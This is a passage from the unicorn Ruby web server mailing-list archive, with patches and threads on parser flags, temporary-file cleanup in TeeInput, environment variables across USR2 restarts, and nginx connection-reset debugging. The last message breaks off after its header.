 ext/unicorn_http/unicorn_http.rl | 26 +++++++++++++++++++++++---
 lib/unicorn/http_request.rb      |  4 +---
 test/unit/test_http_parser_ng.rb | 11 +++++++++++
 3 files changed, 35 insertions(+), 6 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index bd45dd0..a5f069d 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -25,6 +25,7 @@ void init_unicorn_httpdate(void);
 #define UH_FL_KAVERSION 0x80
 #define UH_FL_HASHEADER 0x100
 #define UH_FL_TO_CLEAR 0x200
+#define UH_FL_RESSTART 0x400 /* for check_client_connection */
 
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
@@ -60,7 +61,7 @@ struct http_parser {
   } len;
 };
 
-static ID id_set_backtrace, id_response_start_sent;
+static ID id_set_backtrace;
 
 #ifdef HAVE_RB_HASH_CLEAR /* Ruby >= 2.0 */
 #  define my_hash_clear(h) (void)rb_hash_clear(h)
@@ -597,7 +598,6 @@ static VALUE HttpParser_clear(VALUE self)
 
   http_parser_init(hp);
   my_hash_clear(hp->env);
-  rb_ivar_set(self, id_response_start_sent, Qfalse);
 
   return self;
 }
@@ -880,6 +880,25 @@ static VALUE HttpParser_filter_body(VALUE self, VALUE dst, VALUE src)
   return src;
 }
 
+static VALUE HttpParser_rssset(VALUE self, VALUE boolean)
+{
+  struct http_parser *hp = data_get(self);
+
+  if (RTEST(boolean))
+    HP_FL_SET(hp, RESSTART);
+  else
+    HP_FL_UNSET(hp, RESSTART);
+
+  return boolean; /* ignored by Ruby anyways */
+}
+
+static VALUE HttpParser_rssget(VALUE self)
+{
+  struct http_parser *hp = data_get(self);
+
+  return HP_FL_TEST(hp, RESSTART) ? Qtrue : Qfalse;
+}
+
 #define SET_GLOBAL(var,str) do { \
   var = find_common_field(str, sizeof(str) - 1); \
   assert(!NIL_P(var) && "missed global field"); \
@@ -914,6 +933,8 @@ void Init_unicorn_http(void)
   rb_define_method(cHttpParser, "next?", HttpParser_next, 0);
   rb_define_method(cHttpParser, "buf", HttpParser_buf, 0);
   rb_define_method(cHttpParser, "env", HttpParser_env, 0);
+  rb_define_method(cHttpParser, "response_start_sent=", HttpParser_rssset, 1);
+  rb_define_method(cHttpParser, "response_start_sent", HttpParser_rssget, 0);
 
   /*
    * The maximum size a single chunk when using chunked transfer encoding.
@@ -939,7 +960,6 @@ void Init_unicorn_http(void)
   SET_GLOBAL(g_content_length, "CONTENT_LENGTH");
   SET_GLOBAL(g_http_connection, "CONNECTION");
   id_set_backtrace = rb_intern("set_backtrace");
-  id_response_start_sent = rb_intern("@response_start_sent");
   init_unicorn_httpdate();
 
 #ifndef HAVE_RB_HASH_CLEAR
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index f5c6b5b..9339bce 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -25,8 +25,6 @@ class Unicorn::HttpParser
   RACK_HIJACK_IO = "rack.hijack_io".freeze
   NULL_IO = StringIO.new("")
 
-  attr_accessor :response_start_sent
-
   # :stopdoc:
   # A frozen format for this is about 15% faster
   # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
@@ -92,7 +90,7 @@ class Unicorn::HttpParser
 
     # detect if the socket is valid by writing a partial response:
     if @@check_client_connection && headers?
-      @response_start_sent = true
+      self.response_start_sent = true
       HTTP_RESPONSE_START.each { |c| socket.write(c) }
     end
 
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index efd82e1..d186f5a 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -34,6 +34,17 @@ class HttpParserNgTest < Test::Unit::TestCase
     assert_equal false, @parser.response_start_sent
   end
 
+  def test_response_start_sent
+    assert_equal false, @parser.response_start_sent, "default is false"
+    @parser.response_start_sent = true
+    assert_equal true, @parser.response_start_sent
+    @parser.response_start_sent = false
+    assert_equal false, @parser.response_start_sent
+    @parser.response_start_sent = true
+    @parser.clear
+    assert_equal false, @parser.response_start_sent
+  end
+
   def test_connection_TE
     @parser.buf << "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: TE\r\n"
     @parser.buf << "TE: trailers\r\n\r\n"
-- 
EW


^ permalink raw reply related	[relevance 2%]

* [PATCH] favor kgio_wait_readable for single FD over select
@ 2015-05-07 22:16  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-05-07 22:16 UTC (permalink / raw)
  To: unicorn-public

kgio_wait_readable is superior for single FDs in that it may use the
ppoll syscall on Linux via Ruby, making it immune to the slowdown of
high FDs with select() and the array allocations enforced by the
Ruby wrapper interface.

Note: IO#wait in the io/wait stdlib has the same effect, but as of
2.2 still needlessly checks the FIONREAD ioctl.  So avoid needing to
force a new require on users which also incur shared object loading
costs.  The longer term plan is to rely entirely on Ruby IO
primitives entirely and drop kgio, but that won't happen until we
can depend on Ruby 2.3 for exception-free accept_nonblock
(which will be released December 2015).
---
 lib/unicorn/http_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index a726c91..82747b8 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -369,7 +369,7 @@ class Unicorn::HttpServer
 
   # wait for a signal hander to wake us up and then consume the pipe
   def master_sleep(sec)
-    IO.select([ @self_pipe[0] ], nil, nil, sec) or return
+    @self_pipe[0].kgio_wait_readable(sec) or return
     # 11 bytes is the maximum string length which can be embedded within
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: TeeInput leaks file handles/space
  2015-04-24  3:08  0%         ` Eric Wong
@ 2015-04-24 11:56  0%           ` Mulvaney, Mike
  0 siblings, 0 replies; 200+ results
From: Mulvaney, Mike @ 2015-04-24 11:56 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

That sounds great. Thanks for fixing this so fast!

-Mike

> On Apr 23, 2015, at 11:08 PM, Eric Wong <e@80x24.org> wrote:
> 
> "Mulvaney, Mike" <MMulvaney@bna.com> wrote:
>> I think it would be reasonable to fix this for Rack 1.6+.  It won't
>> cause any problems for Rack 1.5 users, right?  The environment
>> variable gets set and then ignored, so the app would behave exactly
>> the same way.  If they want to use the new cleanup code, they can
>> upgrade rack.
> 
> Right, this only affects 1.6 users.  1.5 users will need to upgrade for
> this.

^ permalink raw reply	[relevance 0%]

* Re: TeeInput leaks file handles/space
  2015-04-22 19:24  2%       ` Mulvaney, Mike
@ 2015-04-24  3:08  0%         ` Eric Wong
  2015-04-24 11:56  0%           ` Mulvaney, Mike
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-04-24  3:08 UTC (permalink / raw)
  To: Mulvaney, Mike; +Cc: unicorn-public@bogomips.org

"Mulvaney, Mike" <MMulvaney@bna.com> wrote:
> I think it would be reasonable to fix this for Rack 1.6+.  It won't
> cause any problems for Rack 1.5 users, right?  The environment
> variable gets set and then ignored, so the app would behave exactly
> the same way.  If they want to use the new cleanup code, they can
> upgrade rack.

Right, this only affects 1.6 users.  1.5 users will need to upgrade for
this.

^ permalink raw reply	[relevance 0%]

* Re: Unicorn, environment variables, start and reload
  @ 2015-04-23  9:29  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-04-23  9:29 UTC (permalink / raw)
  To: Jérémy Lecour; +Cc: unicorn-public

Jérémy Lecour <jeremy.lecour@gmail.com> wrote:
> Hi,
> 
> For some time I've been using Unicorn to serve Rails applications.
> 
> I've been increasingly relying on environment variables to set various
> password and configuration bits outside of the application's code.
> 
> For that I've been using the "dotenv" gem that load a `.env` file into
> the ENV hash. It's great and really useful in development mode, but
> it's not a best practice to use it in production. Here is what Brandon
> Keepers (maintainer of Dotenv) says about this :
> 
> > One of the reasons I don't advocate for using dotenv in production is because it loads the environment variables within the ruby process, which makes it very difficult to track which variables were previously set and which were loaded by dotenv. If you set these variables in the environment of your server (/etc/environment, /etc/profile, etc) then unicorn reloading will just work.

Right, and some of these envs might not work unless they're set before
Ruby VM initialization.  By the time the process can run Ruby code, it's
too late to set up most malloc behavior in any program or GC tuning for
Ruby.

I think most of the MRI-specific RUBY_* vars and most environment
variables used for any malloc tuning will fall into this group.

> So I was wondering what would be the correct way to have environment
> variables available in the Ruby process, up-to-date when the Unicorn
> process is started and reloaded too (with USR2).
> 
> And there is also the case of various shell initializations
> (login/non-login, interactive/non-interactive) and supervisors like
> Monit that strip the environment to a minumum before executing the
> start/stop commands.

I set them in an init script (or whatever startup script/system I use).
I might also use "env -i" to clobber any existing environment if
I'm feeling really thorough, but usually I don't.

Most versions of Linux allow checking the environment by inspecting
/proc/$PID/environ  (tr '\0' '\n' </proc/$PID/environ to convert
null-terminated to newlines).  This may not reflect changes done inside
the process, though, so maybe have a private endpoint dump the contents
of ENV.
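
For the private endpoint idea, a minimal Rack sketch you could drop
into config.ru (the /__env path is made up; protect or remove it once
you're done debugging):

# config.ru (before "run YourApp"):
map '/__env' do
  run lambda { |_env|
    body = ENV.to_hash.sort.map { |k, v| "#{k}=#{v}\n" }.join
    [200, { 'Content-Type' => 'text/plain' }, [body]]
  }
end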

> I understand that I can do something like this on start :
> 
>     $ source ~/my/app/.env && unicorn [...]
> 
> But what about the reload situation ?

You can change the ENV (or run any other Ruby) in the config file, but
most might not take effect until a new process is spawned (same with
dotenv).  This means you may need USR2 for it to take effect.
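
A sketch of what that can look like in the unicorn config file
(variable names and paths below are made up; it only affects processes
spawned afterwards):

# in the config file passed via -c/--config-file; only processes
# spawned after the next USR2 will see these:
ENV['SECRET_KEY_BASE'] ||= File.read('/etc/ourapp/secret_key_base').strip
ENV['DATABASE_URL'] ||= File.read('/etc/ourapp/database_url').strip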

I definitely keep ENV changes in the Ruby config file synched with
what's in the init script (and both in version control).

^ permalink raw reply	[relevance 2%]

* RE: TeeInput leaks file handles/space
  @ 2015-04-22 19:24  2%       ` Mulvaney, Mike
  2015-04-24  3:08  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Mulvaney, Mike @ 2015-04-22 19:24 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

Oh yeah, I like that even better.

The app I'm currently working on is using Rails 4.1 and Rack 1.5.x.  I don't have any problem with upgrading rack, I just haven't done it yet.

I think it would be reasonable to fix this for Rack 1.6+.  It won't cause any problems for Rack 1.5 users, right?  The environment variable gets set and then ignored, so the app would behave exactly the same way.  If they want to use the new cleanup code, they can upgrade rack.

-Mike

-----Original Message-----
From: Eric Wong [mailto:e@80x24.org] 
Sent: Wednesday, April 22, 2015 3:16 PM
To: Mulvaney, Mike
Cc: unicorn-public@bogomips.org
Subject: Re: TeeInput leaks file handles/space

"Mulvaney, Mike" <MMulvaney@bna.com> wrote:
> That looks reasonable to me -- this way you would only have one file 
> still open per process at a maximum, right?  I think that's a good 
> solution.

Right.

Below is a barely-tested alternative patch for Rack::TempfileReaper, for Rack 1.6+ users only.  I'm not sure how prevalent 1.6+ is; it was only released in December 2014...

It's more standardized, but maybe Rack 1.6 isn't prevalent enough, yet.
What do you think?

(Sorry, in a rush, no commit message, yet)

diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 637c583..7f6baa2 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -28,13 +28,20 @@ class Unicorn::TeeInput < Unicorn::StreamInput
     @@client_body_buffer_size
   end
 
+  # for Rack::TempfileReaper in rack 1.6+
+  def new_tmpio
+    tmpio = Unicorn::TmpIO.new
+    (@parser.env['rack.tempfiles'] ||= []) << tmpio
+    tmpio
+  end
+
   # Initializes a new TeeInput object.  You normally do not have to call
   # this unless you are writing an HTTP server.
   def initialize(socket, request)
     @len = request.content_length
     super
     @tmp = @len && @len <= @@client_body_buffer_size ?
-           StringIO.new("") : Unicorn::TmpIO.new
+           StringIO.new("") : new_tmpio
   end
 
   # :call-seq:
diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb
index c97979a..db88ed3 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -21,4 +21,7 @@ class Unicorn::TmpIO < File
     fp.sync = true
     fp
   end
+
+  # pretend we're Tempfile for Rack::TempfileReaper
+  alias close! close
 end

^ permalink raw reply	[relevance 2%]

* RE: TeeInput leaks file handles/space
  2015-04-22 18:38  2% ` Eric Wong
@ 2015-04-22 19:10  2%   ` Mulvaney, Mike
    0 siblings, 1 reply; 200+ results
From: Mulvaney, Mike @ 2015-04-22 19:10 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

That looks reasonable to me -- this way you would only have one file still open per process at a maximum, right?  I think that's a good solution.

Thanks,

-Mike

-----Original Message-----
From: Eric Wong [mailto:e@80x24.org] 
Sent: Wednesday, April 22, 2015 2:38 PM
To: Mulvaney, Mike
Cc: unicorn-public@bogomips.org
Subject: Re: TeeInput leaks file handles/space

How about this patch to tee_input?  It won't pollute the common code path, at least, and unicorn won't support multiple clients/tee_inputs

I might release 4.8.4 with this, but it does break behavior for hijackers, but 5.0 will have lots of tiny internal incompatibilities for corner-cases anyways.
-----------------------------8<---------------------------
Subject: [PATCH] tee_input: close temporary file upon allocating the next

This prevents unicorn from using up too much space due to large uploads while not polluting the common code path of most clients.

This is only fine for unicorn since unicorn itself will never support multiple clients in the same process.

This may break users of rack.hijack (are there any on unicorn?), but they can call IO#dup on the file if they're relying on hijack and server internals like that.

In a perfect world, we could even truncate and rewind to avoid the FD/inode deallocation/allocations in the kernel; but that would break any IO#dup workarounds used by hijackers.

Notes: StringIO#close does not release memory immediately, so there's no point in calling it here

Ref: <CY1PR0301MB078011EB5A22B733EB222A45A4EE0@CY1PR0301MB0780.namprd03.prod.outlook.com>
Reported-by: Mike Mulvaney <MMulvaney@bna.com>
---
 lib/unicorn/tee_input.rb | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 637c583..6ff8210 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -9,12 +9,17 @@
 # strict interpretation of Rack::Lint::InputWrapper functionality and
 # will not support any deviations from it.
 #
+# This is an internal class meant for Unicorn only, any use beyond
+# what appears in the Rack specificiation is unsupported and subject
+# to change.
+#
 # When processing uploads, Unicorn exposes a TeeInput object under
 # "rack.input" of the Rack environment.
 class Unicorn::TeeInput < Unicorn::StreamInput
   # The maximum size (in +bytes+) to buffer in memory before
   # resorting to a temporary file.  Default is 112 kilobytes.
   @@client_body_buffer_size = Unicorn::Const::MAX_BODY
+  @@cur_tmpio = nil
 
   # sets the maximum size of request bodies to buffer in memory,
   # amounts larger than this are buffered to the filesystem
@@ -28,13 +33,21 @@ class Unicorn::TeeInput < Unicorn::StreamInput
     @@client_body_buffer_size
   end
 
+  # This class is essentially a singleton since unicorn will never support
+  # multiple clients; and we don't want to pollute the common code path
+  # with extra ivars/state
+  def new_tmpio
+    @@cur_tmpio.close if @@cur_tmpio
+    @@cur_tmpio = Unicorn::TmpIO.new
+  end
+
   # Initializes a new TeeInput object.  You normally do not have to call
   # this unless you are writing an HTTP server.
   def initialize(socket, request)
     @len = request.content_length
     super
     @tmp = @len && @len <= @@client_body_buffer_size ?
-           StringIO.new("") : Unicorn::TmpIO.new
+           StringIO.new("") : new_tmpio
   end
 
   # :call-seq:
--
EW

^ permalink raw reply	[relevance 2%]

* Re: TeeInput leaks file handles/space
  @ 2015-04-22 18:38  2% ` Eric Wong
  2015-04-22 19:10  2%   ` Mulvaney, Mike
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-04-22 18:38 UTC (permalink / raw)
  To: Mulvaney, Mike; +Cc: unicorn-public@bogomips.org

How about this patch to tee_input?  It won't pollute the common code
path, at least, and unicorn won't support multiple clients/tee_inputs

I might release 4.8.4 with this, but it does break behavior for
hijackers, but 5.0 will have lots of tiny internal incompatibilities
for corner-cases anyways.
-----------------------------8<---------------------------
Subject: [PATCH] tee_input: close temporary file upon allocating the next

This prevents unicorn from using up too much space due to large
uploads while not polluting the common code path of most clients.

This is only fine for unicorn since unicorn itself will never
support multiple clients in the same process.

This may break users of rack.hijack (are there any on unicorn?), but
they can call IO#dup on the file if they're relying on hijack and
server internals like that.

In a perfect world, we could even truncate and rewind to avoid the
FD/inode deallocation/allocations in the kernel; but that would
break any IO#dup workarounds used by hijackers.

Notes: StringIO#close does not release memory immediately, so
there's no point in calling it here

Ref: <CY1PR0301MB078011EB5A22B733EB222A45A4EE0@CY1PR0301MB0780.namprd03.prod.outlook.com>
Reported-by: Mike Mulvaney <MMulvaney@bna.com>
---
 lib/unicorn/tee_input.rb | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 637c583..6ff8210 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -9,12 +9,17 @@
 # strict interpretation of Rack::Lint::InputWrapper functionality and
 # will not support any deviations from it.
 #
+# This is an internal class meant for Unicorn only, any use beyond
+# what appears in the Rack specificiation is unsupported and subject
+# to change.
+#
 # When processing uploads, Unicorn exposes a TeeInput object under
 # "rack.input" of the Rack environment.
 class Unicorn::TeeInput < Unicorn::StreamInput
   # The maximum size (in +bytes+) to buffer in memory before
   # resorting to a temporary file.  Default is 112 kilobytes.
   @@client_body_buffer_size = Unicorn::Const::MAX_BODY
+  @@cur_tmpio = nil
 
   # sets the maximum size of request bodies to buffer in memory,
   # amounts larger than this are buffered to the filesystem
@@ -28,13 +33,21 @@ class Unicorn::TeeInput < Unicorn::StreamInput
     @@client_body_buffer_size
   end
 
+  # This class is essentially a singleton since unicorn will never support
+  # multiple clients; and we don't want to pollute the common code path
+  # with extra ivars/state
+  def new_tmpio
+    @@cur_tmpio.close if @@cur_tmpio
+    @@cur_tmpio = Unicorn::TmpIO.new
+  end
+
   # Initializes a new TeeInput object.  You normally do not have to call
   # this unless you are writing an HTTP server.
   def initialize(socket, request)
     @len = request.content_length
     super
     @tmp = @len && @len <= @@client_body_buffer_size ?
-           StringIO.new("") : Unicorn::TmpIO.new
+           StringIO.new("") : new_tmpio
   end
 
   # :call-seq:
-- 
EW

^ permalink raw reply related	[relevance 2%]

* Re: $USER and $HOME shell variables not set
  2015-03-27 14:32  3% $USER and $HOME shell variables not set Russell Jennings
@ 2015-03-27 18:34  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-27 18:34 UTC (permalink / raw)
  To: Russell Jennings; +Cc: unicorn-public

Russell Jennings <violentpurr@gmail.com> wrote:
> Hello,
> 
> I am running into some issues with these variables being set - since I
> am spawning a script from a unicorn worker (via a rails controller) I
> figured I’d ask here. 
> 
> Here is the stackoverflow with the full background:
> http://stackoverflow.com/questions/29233181/why-is-envhome-nil-in-my-rake-task
> 
> in short: does unicorn have anything to do with $HOME or $USER not
> being defined?

Nope, unicorn itself does not change these variables.  We only set
UNICORN_FD (for SIGUSR2 upgrades), PWD (if working_directory is used).

Your init system may change users and clobber these options via
sudo/su/env and similar wrappers, so I think it has to do with how
you're starting unicorn.  If you're using sudo anywhere, the env_*
options from the sudoers files will also affect which envs get
clobbered/preserved/added.

> From what I can tell, unicorn is the only
> thing that's different versus running the same ruby via a rails console
> (which does indeed set those shell variables correctly)
> 
> in no man's land, so any help or insight would be greatly appreciated. 

Can you add something to log the contents of ENV.inspect to
a log file?  Perhaps something like:

	Rails.logger.debug("env: #{ENV.inspect}")

It would also be helpful to show the snippet of code from where you're
running Rake in case you're accidentally setting an option wrong.


Under Linux, you can also inspect the original environment of any running
process from /proc/$PID/environ  In most cases/kernel versions, it won't
keep up with env changes once a process is running.
I use tr to replace '\0' with '\n' (newline) to help with readability

	tr '\0' '\n' </proc/$PID/environ

^ permalink raw reply	[relevance 0%]

* $USER and $HOME shell variables not set
@ 2015-03-27 14:32  3% Russell Jennings
  2015-03-27 18:34  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Russell Jennings @ 2015-03-27 14:32 UTC (permalink / raw)
  To: unicorn-public

Hello,

I am running into some issues with these variables being set - since I am spawning a script from a unicorn worker (via a rails controller) I figured I’d ask here. 

Here is the stackoverflow with the full background:
http://stackoverflow.com/questions/29233181/why-is-envhome-nil-in-my-rake-task

in short: does unicorn have anything to do with $HOME or $USER not being defined? From what I can tell, unicorn is the only thing that's different versus running the same ruby via a rails console (which does indeed set those shell variables correctly)

in no man's land, so any help or insight would be greatly appreciated. 

Thanks,
Russell

^ permalink raw reply	[relevance 3%]

* Re: nginx reverse proxy getting ECONNRESET
  @ 2015-03-25 10:12  3%                 ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-25 10:12 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> On Tue, Mar 24, 2015 at 11:55 PM, Eric Wong <e@80x24.org> wrote:
> 
> > Actually, are you getting 502 errors returned from nginx in this case?
> > That would not be harmless.  I suggest ensuring rack.input is
> > fully-drained if that is the case (perhaps using PrereadInput).
> 
> No, they're all 200 responses with a zero-length body size.  It's the
> first time I'd ever seen such a combination of symptoms.

OK, thanks for the update.

I was wondering if including a Unicorn::PostreadInput middleware should
be introduced to quiet your logs.  It should have the same effect as
PrereadInput, but should provide better performance in the common case
and also be compatible with "rewindable_input false" users.

class Unicorn::PostreadInput
  def initialize(app)
    @app = app
  end

  def call(env)
    input = env["rack.input"] # save it here, in case the app reassigns it
    @app.call(env)
  ensure
    # Ensure the HTTP request is entirely read off the socket even
    # if the app aborts early.  This should prevent nginx from
    # complaining about ECONNRESET errors.
    unless env["rack.hijack_io"]
      buf = ''
      true while input.read(16384, buf)
      buf.clear
    end
  end
end

(totally untested)
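
Wiring it up would be the usual middleware setup in config.ru
(sketch; YourApp is a placeholder for any Rack app):

# config.ru (sketch)
use Unicorn::PostreadInput
run YourApp.new  # any Rack application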

"Postread" doesn't sound quite right, though...

^ permalink raw reply	[relevance 3%]

* Re: nginx reverse proxy getting ECONNRESET
  @ 2015-03-24 22:54  3% ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-24 22:54 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> We have an nginx 1.6.2 proxy in front of a Unicorn 4.8.3 server that
> is frequently reporting the following error:
> 
> 2015/03/24 01:46:01 [error] 11217#0: *872231 readv() failed (104:
> Connection reset by peer) while reading upstream
> 
> The interesting things are:
> 
> 1) The upstream is a Unix domain socket (to which Unicorn is bound)
> 2) Unicorn isn't reporting that a child died in the error log (and I
> verified their lifetimes with ps(1))
> 
> Any hints as to what we should look for?

What changed recently with your setup?

Which OS/kernel version + vendor version?

Since you've been around a while, I take it this is only a recent issue?

Can you setup a test instance on a different nginx port/unicorn socket
and with a config.ru such as:

------------------------- 8< ----------------------
run(lambda do |env|
  $stderr.write("#$$ starting at #{Time.now}\n")
  # be sure to configure your unicorn timeout
  sleep
  # should not return, wait for unicorn to kill
end)
----------------------------------------------------

And hitting nginx with a single test request to reproduce the issue.

And see if it happens on the same/different hosts where you notice the
problem.

^ permalink raw reply	[relevance 3%]

* Re: On USR2, new master runs with same PID
  2015-03-20  1:58  8%       ` Kevin Yank
@ 2015-03-20  2:08  8%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-20  2:08 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> Regarding zero-downtime deploys:
> 
> On 12 Mar 2015, at 5:45 pm, Eric Wong <e@80x24.org> wrote:
> 
> > Best bet would be to run with double the workers temporarily unless
> > you're too low on memory (and swapping) or backend (DB) connections or
> > any other resource.
>  
> I’d like to take this approach as I do have enough memory to spare.
> How do you usually implement this? Any good write-ups or sample
> configs you can point me to?

Only send SIGUSR2 to the master, leaving you with two masters and two
sets of workers.  Skip (automated) sending of SIGTTOU signals to lower
worker count to the old master.

Eventually, you'll decide to send SIGQUIT to the old master to stop
it (or the new one, if you decide the new code is broken).

You can still combine this with SIGWINCH (or SIGTTOU) to stop traffic
flow to the old master, too.

Thanks for following up on your logrotate/eye issue, by the way.

^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  6:45  7%     ` Eric Wong
  2015-03-20  1:55  8%       ` Kevin Yank
@ 2015-03-20  1:58  8%       ` Kevin Yank
  2015-03-20  2:08  8%         ` Eric Wong
  1 sibling, 1 reply; 200+ results
From: Kevin Yank @ 2015-03-20  1:58 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 576 bytes --]

Regarding zero-downtime deploys:

On 12 Mar 2015, at 5:45 pm, Eric Wong <e@80x24.org> wrote:

> Best bet would be to run with double the workers temporarily unless
> you're too low on memory (and swapping) or backend (DB) connections or
> any other resource.

I’d like to take this approach as I do have enough memory to spare. How do you usually implement this? Any good write-ups or sample configs you can point me to?

Thanks again,

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  6:45  7%     ` Eric Wong
@ 2015-03-20  1:55  8%       ` Kevin Yank
  2015-03-20  1:58  8%       ` Kevin Yank
  1 sibling, 0 replies; 200+ results
From: Kevin Yank @ 2015-03-20  1:55 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1165 bytes --]


> On 12 Mar 2015, at 5:45 pm, Eric Wong <e@80x24.org> wrote:
> 
> Kevin Yank <kyank@avalanche.com.au> wrote:
>> It’s possible; I’m using eye (https://github.com/kostya/eye) as a
> 
> Aha!  I forgot about that one, try upgrading to unicorn 4.8.3 which
> fixed this issue last year.  ref:
> 
> http://bogomips.org/unicorn-public/m/20140504023338.GA583@dcvr.yhbt.net.html
> http://bogomips.org/unicorn-public/m/20140502231558.GA4215@dcvr.yhbt.net.html

Finally solved this definitively. It was user error to do with my setup of the eye process monitor.

I’d accidentally deployed a buggy logrotate configuration for eye, which was causing a second eye daemon to be spawned once a day (when the logs were rotated). Those two eye daemons ran side-by-side, and fought with each other when one was told to restart Unicorn. I’d already anticipated and fixed this problem, but failed to deploy the correct version of the config to our cluster.

All fixed now. Thanks for your pointers; they put me on the right track. :)

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  6:26  8%   ` Kevin Yank
@ 2015-03-12  6:45  7%     ` Eric Wong
  2015-03-20  1:55  8%       ` Kevin Yank
  2015-03-20  1:58  8%       ` Kevin Yank
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2015-03-12  6:45 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> It’s possible; I’m using eye (https://github.com/kostya/eye) as a

Aha!  I forgot about that one, try upgrading to unicorn 4.8.3 which
fixed this issue last year.  ref:

http://bogomips.org/unicorn-public/m/20140504023338.GA583@dcvr.yhbt.net.html
http://bogomips.org/unicorn-public/m/20140502231558.GA4215@dcvr.yhbt.net.html

<snip>

> unicorn master
> `- unicorn master 
> `- unicorn worker[2]
> |  `- unicorn worker[2]
> `- unicorn worker[1]
> |  `- unicorn worker[1]
> `- unicorn worker[0]
>    `- unicorn worker[0]

The second master there is the new one, and the first is the old one.

I was more concerned if there are multiple masters with no parent-child
relationship to each other; but that seems to not be the case.

But yeah, give 4.8.3 a try since it should've fixed the problem
(which was reported and confirmed privately)

> This has been happening pretty frequently across multiple server
> instances, and again once it starts happening on an instance, it keeps
> happening 100% of the time (until I restart Unicorn completely). So
> it’s not a rare edge case.

You can probably recover by removing the pid files entirely
and HUP the (only) master; but I haven't tried it...

> > That's a pretty fragile config and I regret ever including it in the
> > example config files

> Any better examples/docs you’d recommend I consult for guidance? Or is
> expecting to achieve a robust zero-downtime restart using
> before_fork/after_fork hooks unrealistic?

Best bet would be to run with double the workers temporarily unless
you're too low on memory (and swapping) or backend (DB) connections or
any other resource.

If you're really low on memory/connections, do WINCH + USR2 + QUIT (and
pray the new master works right :).  Clients will suffer in response
time as your new app loads, so do it during non-peak traffic and/or
shift traffic away from that machine.

You can also send TTOU a few times to reduce worker counts instead of
WINCH to nuke all of them, but I'd send all signals via deploy
script/commands rather than automatically via (synchronous) hooks.

But that's just me; probably others do things differently...

^ permalink raw reply	[relevance 7%]

* Re: On USR2, new master runs with same PID
  2015-03-12  1:45 10% ` Eric Wong
@ 2015-03-12  6:26  8%   ` Kevin Yank
  2015-03-12  6:45  7%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Kevin Yank @ 2015-03-12  6:26 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 5164 bytes --]

Thanks for your help, Eric!

> On 12 Mar 2015, at 12:45 pm, Eric Wong <e@80x24.org> wrote:
> 
